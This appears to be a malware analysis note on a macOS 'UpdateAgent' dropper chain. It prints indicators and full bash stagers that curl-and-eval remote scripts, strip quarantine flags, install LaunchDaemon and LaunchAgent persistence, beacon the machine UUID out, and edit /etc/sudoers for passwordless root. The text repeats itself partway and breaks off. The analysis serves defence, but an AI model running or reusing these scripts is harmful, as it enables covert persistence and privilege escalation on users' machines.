sysopfb/UpdateAgent Golang

## UpdateAgent Golang
2aaebf0282463c60aa8866e733799eee97f41af1e3ac8ae7855279595217aa2f

SnapITool.zip

```
https://vzhqu.snapitool.com/SnapITool.zip

```

```
/bin/sh -c ioreg -ad2 -c IOPlatformExpertDevice | xmllint --xpath '//key[.='IOPlatformUUID']/following-sibling::*[1]/text()' -


/bin/sh -c LSPJUJGMLBTMAMMPBETB=$(curl --connect-timeout 900 -L 'https://xrcpsvz.snapitool.com/alkzsba?machine_id=11111111-2222-3333-4444-555555555555&pr=snapitool') eval '$LSPJUJGMLBTMAMMPBETB'

```

Downloaded code:

```
#!/bin/bash
eventsNameStep1="system_intermediate_agent_step_1"
eventsNameStep1Fail="system_intermediate_agent_step_1_fail"
eventsNameStep2="system_intermediate_agent_step_2"
eventsNameStep2Fail="system_intermediate_agent_step_2_fail"
eventsNameStep3="system_intermediate_agent_step_3"
eventsNameStep3Fail="system_intermediate_agent_step_3_fail"
eventsNameStep4="system_intermediate_agent_step_4"
eventsNameStep4Fail="system_intermediate_agent_step_4_fail"
eventsNameStep5="system_intermediate_agent_step_5"
eventsNameStep5Fail="system_intermediate_agent_step_5_fail"
eventsNameStep6="system_intermediate_agent_step_6"
eventsNameStep6Fail="system_intermediate_agent_step_6_fail"
eventsNameStep7="system_intermediate_agent_step_7"
eventsNameStep7Fail="system_intermediate_agent_step_7_fail"

eventsURL="https://d2u7maudpwyo3n.cloudfront.net/pkg"
productName="com.buffer.system"
productFolder="System"
productTempFolder="jugcoojzoapcetvbktvt"
tempFolder="/tmp/$productTempFolder"
SOFTWAREUPDATEAGENT="SystemBuffer"

MACPLATFORM=`sw_vers -productName`
MACVERSION=`sw_vers -productVersion`

machineID="$(ioreg -ad2 -c IOPlatformExpertDevice | xmllint --xpath '//key[.="IOPlatformUUID"]/following-sibling::*[1]/text()' -)"

userDirectory=$(eval echo ~$(echo $USER))

plistLA="/Library/LaunchDaemons/$productName.plist"

libraryDir="/Library/Application Support/$productFolder"

mkdir -p "$libraryDir"

curl --retry 5 -f "https://shhxpxrfcuocurentw.s3.amazonaws.com/$SOFTWAREUPDATEAGENT.zip" -o "$libraryDir/$SOFTWAREUPDATEAGENT.zip"
if [ $? -eq 0 ]; then
	CONTESTEP1="{\"event\": \"$eventsNameStep1\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP1="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP1' $eventsURL"
	eval $REQSTEP1
	if [ ! 0 -eq $? ]; then
		echo "Failed"
	fi
else
	CONTESTEP1FAIL="{\"event\": \"$eventsNameStep1Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP1FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP1FAIL' $eventsURL"
	eval $REQSTEP1FAIL
	if [ ! 0 -eq $? ]; then
		echo "Failed"
	fi
fi

xattr -r -d com.apple.quarantine "$libraryDir/$SOFTWAREUPDATEAGENT.zip"

chmod -R 777 "$libraryDir/$SOFTWAREUPDATEAGENT.zip"

ditto -x -k "$libraryDir/$SOFTWAREUPDATEAGENT.zip" "$libraryDir"

xattr -r -d com.apple.quarantine "$libraryDir/$SOFTWAREUPDATEAGENT"

chmod -R 777 "$libraryDir/$SOFTWAREUPDATEAGENT"

mkdir -p "$tempFolder"

touch "$tempFolder/$productName.plist"
if [ $? -eq 0 ]; then
	CONTESTEP2="{\"event\": \"$eventsNameStep2\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP2="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP2' $eventsURL"
	eval $REQSTEP2
	if [ ! 0 -eq $? ]; then
		echo "Failed"
	fi
else
	CONTESTEP2FAIL="{\"event\": \"$eventsNameStep2Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP2FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP2FAIL' $eventsURL"
	eval $REQSTEP2FAIL
	if [ ! 0 -eq $? ]; then
		echo "Failed"
	fi
fi

echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
	<dict>
		<key>Label</key>
		<string>$productName</string>
		<key>Program</key>
		<string>$libraryDir/$SOFTWAREUPDATEAGENT</string>
		<key>RunAtLoad</key>
		<true />
		<key>StartInterval</key>
		<integer>3600</integer>
	</dict>
</plist>
" > "$tempFolder/$productName.plist"
if [ $? -eq 0 ]; then
	CONTESTEP3="{\"event\": \"$eventsNameStep3\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP3="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP3' $eventsURL"
	eval $REQSTEP3
	if [ ! 0 -eq $? ]; then
		echo "Failed"
	fi
else
	CONTESTEP3FAIL="{\"event\": \"$eventsNameStep3Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP3FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP3FAIL' $eventsURL"
	eval $REQSTEP3FAIL
	if [ ! 0 -eq $? ]; then
		echo "Failed"
	fi
fi

chmod -R 777 "$tempFolder/$productName.plist"
if [ $? -eq 0 ]; then
	CONTESTEP4="{\"event\": \"$eventsNameStep4\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP4="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP4' $eventsURL"
	eval $REQSTEP4
	if [ ! 0 -eq $? ]; then
		echo "Failed"
	fi
else
	CONTESTEP4FAIL="{\"event\": \"$eventsNameStep4Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP4FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP4FAIL' $eventsURL"
	eval $REQSTEP4FAIL
	if [ ! 0 -eq $? ]; then
		echo "Failed"
	fi
fi

cp -f "$tempFolder/$productName.plist" "$plistLA"
if [ $? -eq 0 ]; then
	CONTESTEP5="{\"event\": \"$eventsNameStep5\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP5="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP5' $eventsURL"
	eval $REQSTEP5
	if [ ! 0 -eq $? ]; then
		echo "Failed"
	fi
else
	CONTESTEP5FAIL="{\"event\": \"$eventsNameStep5Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP5FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP5FAIL' $eventsURL"
	eval $REQSTEP5FAIL
	if [ ! 0 -eq $? ]; then
		echo "Failed"
	fi
fi

chmod -R 644 "$plistLA"
if [ $? -eq 0 ]; then
	CONTESTEP6="{\"event\": \"$eventsNameStep6\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP6="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP6' $eventsURL"
	eval $REQSTEP6
	if [ ! 0 -eq $? ]; then
		echo "Failed"
	fi
else
	CONTESTEP6FAIL="{\"event\": \"$eventsNameStep6Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP6FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP6FAIL' $eventsURL"
	eval $REQSTEP6FAIL
	if [ ! 0 -eq $? ]; then
		echo "Failed"
	fi
fi

launchctl load -w "$plistLA"
if [ $? -eq 0 ]; then
	CONTESTEP7="{\"event\": \"$eventsNameStep7\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP7="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP7' $eventsURL"
	eval $REQSTEP7
	if [ ! 0 -eq $? ]; then
		echo "Failed"
	fi
else
	CONTESTEP7FAIL="{\"event\": \"$eventsNameStep7Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP7FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP7FAIL' $eventsURL"
	eval $REQSTEP7FAIL
	if [ ! 0 -eq $? ]; then
		echo "Failed"
	fi
fi

rm -rf "$tempFolder"
rm "$libraryDir/$SOFTWAREUPDATEAGENT.zip"

```


The agent downloaded is also a GoLang Macho binary from:

```
shhxpxrfcuocurentw.s3.amazonaws.com/SystemBuffer.zip

```
1b0d39cffd387f818747bb2b2d30aacb0cbd0901713b02b5e86300ce98bbe570  SystemBuffer.zip
6f675c247f2fb4350633f2f0c537fdc99bce92bbfaae184e2d79b68c1eeb2ad0  SystemBuffer


This file then connects in and downloads another bash script to execute

```
curl --connect-timeout 900 -L "https://vrdazgynlt.comsysbuf.com/lklgxnagyx?maid={ID}

```

URL portion is bugged with a error message similar to the jamf blog

```
#!/bin/bash
EVENTSHEARTBEAT="optimizer_intermediate_agent_heartbeat"
EVENTSSTARTING="optimizer_intermediate_agent_started"
EVENTSDLWFileSuccess="optimizer_intermediate_agent_dlw_1_file_success"
EVENTSDLWFileError="optimizer_intermediate_agent_dlw_1_file_error"
EVENTSRunningFileSuccess="optimizer_intermediate_agent_running_1_success"
EVENTSRunningFileError="optimizer_intermediate_agent_running_1_error"
EVENTSUserExists="optimizer_intermediate_agent_already_exists"

EVENTSURL="https://events.optimizerservices.com/pkg"
PRODUCTFOLDER="lmeeznlggvhxsvttiwhtizyleqjdlc"

user=$(ls -l /dev/console | awk '/ / { print $3 }')
userHome=$(eval echo ~$(echo $user))

MACHINEID="$(ioreg -ad2 -c IOPlatformExpertDevice | xmllint --xpath '//key[.="IOPlatformUUID"]/following-sibling::*[1]/text()' -)"

AG_1="$userHome/Library/.pixl"
AG_2="$userHome/Library/Application Support/.logg"

MACPLATFORM=`sw_vers -productName`
MACVERSION=`sw_vers -productVersion`

CONTHEARTBEAT="{\"event\": \"$EVENTSHEARTBEAT\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
REQHEARTBEAT="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTHEARTBEAT' $EVENTSURL"
eval $REQHEARTBEAT

PATHNAME="setup"

if [ ! -f "$AG_1" ]; then

  if [ ! -f "$AG_2" ]; then

    if [[ "$user" != "root" && "$user" != "_windowserver" ]]; then

      CONTEVENTSSTARTING="{\"event\": \"$EVENTSSTARTING\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
      REQEVENTSSTARTING="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTEVENTSSTARTING' $EVENTSURL"
      eval $REQEVENTSSTARTING

      userId=$(id -u $user)

      TMPFILE=$(sudo -u $user mktemp /tmp/XXXXXXXXXXXX)

      SERVICE_NAME="com.$PRODUCTFOLDER"

      LAUNCH_AGENTS_PATH="$userHome/Library/LaunchAgents/"

      PLIST_PATH="$LAUNCH_AGENTS_PATH$SERVICE_NAME.plist"

      URL="<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>
<title>404 - File or directory not found.</title>
<style type="text/css">
<!--
body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}
fieldset{padding:0 15px 10px 15px;}
h1{font-size:2.4em;margin:0;color:#FFF;}
h2{font-size:1.7em;margin:0;color:#CC0000;}
h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}
#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;
background-color:#555555;}
#content{margin:0 0 0 2%;position:relative;}
.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}
-->
</style>
</head>
<body>
<div id="header"><h1>Server Error</h1></div>
<div id="content">
 <div class="content-container"><fieldset>
  <h2>404 - File or directory not found.</h2>
  <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>
 </fieldset></div>
</div>
</body>
</html>
"

      SCRIPT="sudo $TMPFILE pkgsh && rm $TMPFILE && /bin/launchctl bootout gui/$userId/$SERVICE_NAME"

      echo "$user   ALL = NOPASSWD: $TMPFILE pkgsh" >> "/etc/sudoers"

      sudo -u $user mkdir "$LAUNCH_AGENTS_PATH"

      if [ -f "$PLIST_PATH" ]; then

        /bin/launchctl bootout gui/$userId/$SERVICE_NAME

        rm $PLIST_PATH

      fi

      sudo -u $user /usr/bin/curl -L -o "/tmp/setup.dmg" $URL
      if [ $? -eq 0 ]; then
        CONTEUNZIPFILESUCCESS="{\"event\": \"$EVENTSDLWFileSuccess\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
        REQEUNZIPZIPFILESUCCESS="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTEUNZIPFILESUCCESS' $EVENTSURL"
        eval $REQEUNZIPZIPFILESUCCESS
      else
        CONTEUNZIPFILEERROR="{\"event\": \"$EVENTSDLWFileError\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
        REQEUNZIPFILEERROR="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTEUNZIPFILEERROR' $EVENTSURL"
        eval $REQEUNZIPFILEERROR
      fi

      sudo -u $user /usr/bin/xattr -rc "/tmp/setup.dmg"

      sudo -u $user /usr/bin/hdiutil attach "/tmp/setup.dmg"

      if [ -d "/Volumes/Install" ]; then
        PATHNAME="Install"
      fi

      CONTENT_VOLUME=$(ls /Volumes/$PATHNAME | awk '/.app/')

      sudo -u $user cp -rf "/Volumes/$PATHNAME/$CONTENT_VOLUME" "/tmp"

      sleep 2

      sudo -u $user chmod -R 777 "/tmp/$CONTENT_VOLUME"

      sudo -u $user /bin/echo "/tmp/./$CONTENT_VOLUME/Contents/MacOS/$(ls /tmp/$CONTENT_VOLUME/Contents/MacOS | head -n1) -shh" >> $TMPFILE

      sudo -u $user chmod 777 $TMPFILE

      sudo -u $user /usr/libexec/PlistBuddy -c "Add :Label string $SERVICE_NAME" "$PLIST_PATH"

      sudo -u $user /usr/libexec/PlistBuddy -c 'Add :ProgramArguments array' "$PLIST_PATH"

      sudo -u $user /usr/libexec/PlistBuddy -c "Add :ProgramArguments: string /bin/bash" "$PLIST_PATH"

      sudo -u $user /usr/libexec/PlistBuddy -c "Add :ProgramArguments: string -c" "$PLIST_PATH"

      sudo -u $user /usr/libexec/PlistBuddy -c "Add :ProgramArguments: string $SCRIPT" "$PLIST_PATH"

      sudo -u $user /usr/libexec/PlistBuddy -c 'Add :RunAtLoad bool true' "$PLIST_PATH"

      /bin/launchctl bootstrap gui/$userId "$PLIST_PATH"
      if [ $? -eq 0 ]; then
        CONTERUNNINGFILESUCCESS="{\"event\": \"$EVENTSRunningFileSuccess\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
        REQERUNNINGZIPFILESUCCESS="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTERUNNINGFILESUCCESS' $EVENTSURL"
        eval $REQERUNNINGZIPFILESUCCESS
      else
        CONTERUNNINGFILEERROR="{\"event\": \"$EVENTSRunningFileError\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
        REQERUNNINGFILEERROR="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTERUNNINGFILEERROR' $EVENTSURL"
        eval $REQERUNNINGFILEERROR
      fi

      sleep 10

      sed -i '' -e '$ d' /etc/sudoers

      rm $PLIST_PATH
      rm "/tmp/setup.dmg"
      hdiutil detach "$PATHNAME"
    fi

  else

    CONTUSERALREADYUPDATED="{\"event\": \"$EVENTSUserExists\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
    REQUSERALREADYUPDATED="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTUSERALREADYUPDATED' $EVENTSURL"
    eval $REQUSERALREADYUPDATED

  fi

else

  CONTUSERALREADYUPDATED="{\"event\": \"$EVENTSUserExists\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
  REQUSERALREADYUPDATED="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTUSERALREADYUPDATED' $EVENTSURL"
  eval $REQUSERALREADYUPDATED

fi

```
	2aaebf0282463c60aa8866e733799eee97f41af1e3ac8ae7855279595217aa2f

	SnapITool.zip

	```
	https://vzhqu.snapitool.com/SnapITool.zip

	```

	```
	/bin/sh -c ioreg -ad2 -c IOPlatformExpertDevice \| xmllint --xpath '//key[.='IOPlatformUUID']/following-sibling::*[1]/text()' -


	/bin/sh -c LSPJUJGMLBTMAMMPBETB=$(curl --connect-timeout 900 -L 'https://xrcpsvz.snapitool.com/alkzsba?machine_id=11111111-2222-3333-4444-555555555555&pr=snapitool') eval '$LSPJUJGMLBTMAMMPBETB'

	```

	Downloaded code:

	```
	#!/bin/bash
	eventsNameStep1="system_intermediate_agent_step_1"
	eventsNameStep1Fail="system_intermediate_agent_step_1_fail"
	eventsNameStep2="system_intermediate_agent_step_2"
	eventsNameStep2Fail="system_intermediate_agent_step_2_fail"
	eventsNameStep3="system_intermediate_agent_step_3"
	eventsNameStep3Fail="system_intermediate_agent_step_3_fail"
	eventsNameStep4="system_intermediate_agent_step_4"
	eventsNameStep4Fail="system_intermediate_agent_step_4_fail"
	eventsNameStep5="system_intermediate_agent_step_5"
	eventsNameStep5Fail="system_intermediate_agent_step_5_fail"
	eventsNameStep6="system_intermediate_agent_step_6"
	eventsNameStep6Fail="system_intermediate_agent_step_6_fail"
	eventsNameStep7="system_intermediate_agent_step_7"
	eventsNameStep7Fail="system_intermediate_agent_step_7_fail"

	eventsURL="https://d2u7maudpwyo3n.cloudfront.net/pkg"
	productName="com.buffer.system"
	productFolder="System"
	productTempFolder="jugcoojzoapcetvbktvt"
	tempFolder="/tmp/$productTempFolder"
	SOFTWAREUPDATEAGENT="SystemBuffer"

	MACPLATFORM=`sw_vers -productName`
	MACVERSION=`sw_vers -productVersion`

	machineID="$(ioreg -ad2 -c IOPlatformExpertDevice \| xmllint --xpath '//key[.="IOPlatformUUID"]/following-sibling::*[1]/text()' -)"

	userDirectory=$(eval echo ~$(echo $USER))

	plistLA="/Library/LaunchDaemons/$productName.plist"

	libraryDir="/Library/Application Support/$productFolder"

	mkdir -p "$libraryDir"

	curl --retry 5 -f "https://shhxpxrfcuocurentw.s3.amazonaws.com/$SOFTWAREUPDATEAGENT.zip" -o "$libraryDir/$SOFTWAREUPDATEAGENT.zip"
	if [ $? -eq 0 ]; then
	CONTESTEP1="{\"event\": \"$eventsNameStep1\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP1="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP1' $eventsURL"
	eval $REQSTEP1
	if [ ! 0 -eq $? ]; then
	echo "Failed"
	fi
	else
	CONTESTEP1FAIL="{\"event\": \"$eventsNameStep1Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP1FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP1FAIL' $eventsURL"
	eval $REQSTEP1FAIL
	if [ ! 0 -eq $? ]; then
	echo "Failed"
	fi
	fi

	xattr -r -d com.apple.quarantine "$libraryDir/$SOFTWAREUPDATEAGENT.zip"

	chmod -R 777 "$libraryDir/$SOFTWAREUPDATEAGENT.zip"

	ditto -x -k "$libraryDir/$SOFTWAREUPDATEAGENT.zip" "$libraryDir"

	xattr -r -d com.apple.quarantine "$libraryDir/$SOFTWAREUPDATEAGENT"

	chmod -R 777 "$libraryDir/$SOFTWAREUPDATEAGENT"

	mkdir -p "$tempFolder"

	touch "$tempFolder/$productName.plist"
	if [ $? -eq 0 ]; then
	CONTESTEP2="{\"event\": \"$eventsNameStep2\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP2="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP2' $eventsURL"
	eval $REQSTEP2
	if [ ! 0 -eq $? ]; then
	echo "Failed"
	fi
	else
	CONTESTEP2FAIL="{\"event\": \"$eventsNameStep2Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP2FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP2FAIL' $eventsURL"
	eval $REQSTEP2FAIL
	if [ ! 0 -eq $? ]; then
	echo "Failed"
	fi
	fi

	echo "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
	<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
	<plist version=\"1.0\">
	<dict>
	<key>Label</key>
	<string>$productName</string>
	<key>Program</key>
	<string>$libraryDir/$SOFTWAREUPDATEAGENT</string>
	<key>RunAtLoad</key>
	<true />
	<key>StartInterval</key>
	<integer>3600</integer>
	</dict>
	</plist>
	" > "$tempFolder/$productName.plist"
	if [ $? -eq 0 ]; then
	CONTESTEP3="{\"event\": \"$eventsNameStep3\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP3="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP3' $eventsURL"
	eval $REQSTEP3
	if [ ! 0 -eq $? ]; then
	echo "Failed"
	fi
	else
	CONTESTEP3FAIL="{\"event\": \"$eventsNameStep3Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP3FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP3FAIL' $eventsURL"
	eval $REQSTEP3FAIL
	if [ ! 0 -eq $? ]; then
	echo "Failed"
	fi
	fi

	chmod -R 777 "$tempFolder/$productName.plist"
	if [ $? -eq 0 ]; then
	CONTESTEP4="{\"event\": \"$eventsNameStep4\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP4="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP4' $eventsURL"
	eval $REQSTEP4
	if [ ! 0 -eq $? ]; then
	echo "Failed"
	fi
	else
	CONTESTEP4FAIL="{\"event\": \"$eventsNameStep4Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP4FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP4FAIL' $eventsURL"
	eval $REQSTEP4FAIL
	if [ ! 0 -eq $? ]; then
	echo "Failed"
	fi
	fi

	cp -f "$tempFolder/$productName.plist" "$plistLA"
	if [ $? -eq 0 ]; then
	CONTESTEP5="{\"event\": \"$eventsNameStep5\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP5="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP5' $eventsURL"
	eval $REQSTEP5
	if [ ! 0 -eq $? ]; then
	echo "Failed"
	fi
	else
	CONTESTEP5FAIL="{\"event\": \"$eventsNameStep5Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP5FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP5FAIL' $eventsURL"
	eval $REQSTEP5FAIL
	if [ ! 0 -eq $? ]; then
	echo "Failed"
	fi
	fi

	chmod -R 644 "$plistLA"
	if [ $? -eq 0 ]; then
	CONTESTEP6="{\"event\": \"$eventsNameStep6\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP6="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP6' $eventsURL"
	eval $REQSTEP6
	if [ ! 0 -eq $? ]; then
	echo "Failed"
	fi
	else
	CONTESTEP6FAIL="{\"event\": \"$eventsNameStep6Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP6FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP6FAIL' $eventsURL"
	eval $REQSTEP6FAIL
	if [ ! 0 -eq $? ]; then
	echo "Failed"
	fi
	fi

	launchctl load -w "$plistLA"
	if [ $? -eq 0 ]; then
	CONTESTEP7="{\"event\": \"$eventsNameStep7\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP7="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP7' $eventsURL"
	eval $REQSTEP7
	if [ ! 0 -eq $? ]; then
	echo "Failed"
	fi
	else
	CONTESTEP7FAIL="{\"event\": \"$eventsNameStep7Fail\", \"machine_id\": \"$machineID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQSTEP7FAIL="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTESTEP7FAIL' $eventsURL"
	eval $REQSTEP7FAIL
	if [ ! 0 -eq $? ]; then
	echo "Failed"
	fi
	fi

	rm -rf "$tempFolder"
	rm "$libraryDir/$SOFTWAREUPDATEAGENT.zip"

	```


	The agent downloaded is also a GoLang Macho binary from:

	```
	shhxpxrfcuocurentw.s3.amazonaws.com/SystemBuffer.zip

	```
	1b0d39cffd387f818747bb2b2d30aacb0cbd0901713b02b5e86300ce98bbe570 SystemBuffer.zip
	6f675c247f2fb4350633f2f0c537fdc99bce92bbfaae184e2d79b68c1eeb2ad0 SystemBuffer



	This file then connects in and downloads another bash script to execute

	```
	curl --connect-timeout 900 -L "https://vrdazgynlt.comsysbuf.com/lklgxnagyx?maid={ID}

	```

	URL portion is bugged with a error message similar to the jamf blog

	```
	#!/bin/bash
	EVENTSHEARTBEAT="optimizer_intermediate_agent_heartbeat"
	EVENTSSTARTING="optimizer_intermediate_agent_started"
	EVENTSDLWFileSuccess="optimizer_intermediate_agent_dlw_1_file_success"
	EVENTSDLWFileError="optimizer_intermediate_agent_dlw_1_file_error"
	EVENTSRunningFileSuccess="optimizer_intermediate_agent_running_1_success"
	EVENTSRunningFileError="optimizer_intermediate_agent_running_1_error"
	EVENTSUserExists="optimizer_intermediate_agent_already_exists"

	EVENTSURL="https://events.optimizerservices.com/pkg"
	PRODUCTFOLDER="lmeeznlggvhxsvttiwhtizyleqjdlc"

	user=$(ls -l /dev/console \| awk '/ / { print $3 }')
	userHome=$(eval echo ~$(echo $user))

	MACHINEID="$(ioreg -ad2 -c IOPlatformExpertDevice \| xmllint --xpath '//key[.="IOPlatformUUID"]/following-sibling::*[1]/text()' -)"

	AG_1="$userHome/Library/.pixl"
	AG_2="$userHome/Library/Application Support/.logg"

	MACPLATFORM=`sw_vers -productName`
	MACVERSION=`sw_vers -productVersion`

	CONTHEARTBEAT="{\"event\": \"$EVENTSHEARTBEAT\", \"machine_id\": \"$MACHINEID\", \"os\": \"$MACPLATFORM\", \"os_version\": \"$MACVERSION\"}"
	REQHEARTBEAT="curl --retry 5 -H \"Content-Type: application/json; charset=UTF-8\" -X POST -d '$CONTHEARTBEAT' $EVENTSURL"
	eval $REQHEARTBEAT

	PATHNAME="setup"

	if [ ! -f "$AG_1" ]; then

	if [ ! -f "$AG_2" ]; then

	if [[ "$user" != "root" && "$user" != "_windowserver" ]]; then

